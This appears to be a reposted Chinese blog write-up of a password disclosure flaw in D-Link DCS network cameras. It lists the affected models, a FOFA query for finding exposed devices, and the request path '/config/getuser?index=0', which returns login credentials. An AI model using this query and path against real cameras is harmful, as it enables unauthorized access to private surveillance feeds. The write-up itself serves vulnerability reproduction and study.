D-Link DCS 密码泄露漏洞

D-Link DCS-2200是一款监控摄像机,成像色彩为彩色 是一款网络摄像机,

D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面

根据VULDB 所看到的信息原文如下

A vulnerability, which was classified as problematic, was found in D-Link DCS-2530L and DCS-2670L (the affected version unknown). This affects some unknown processing of the file /config/getuser. The manipulation with an unknown input leads to a information disclosure vulnerability (Password). CWE is classifying the issue as CWE-200. This is going to have an impact on confidentiality. The summary by CVE is:

影响版本:

DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703

漏洞复现:

fofa搜索:

app="D_Link-DCS-4622"(上方影响版本都可以)

使用poc进行账号密码查看,得到密码登录即可

/config/getuser?index=0

 

特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。

作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考

猜你喜欢

转载自blog.csdn.net/qq_17754023/article/details/131306224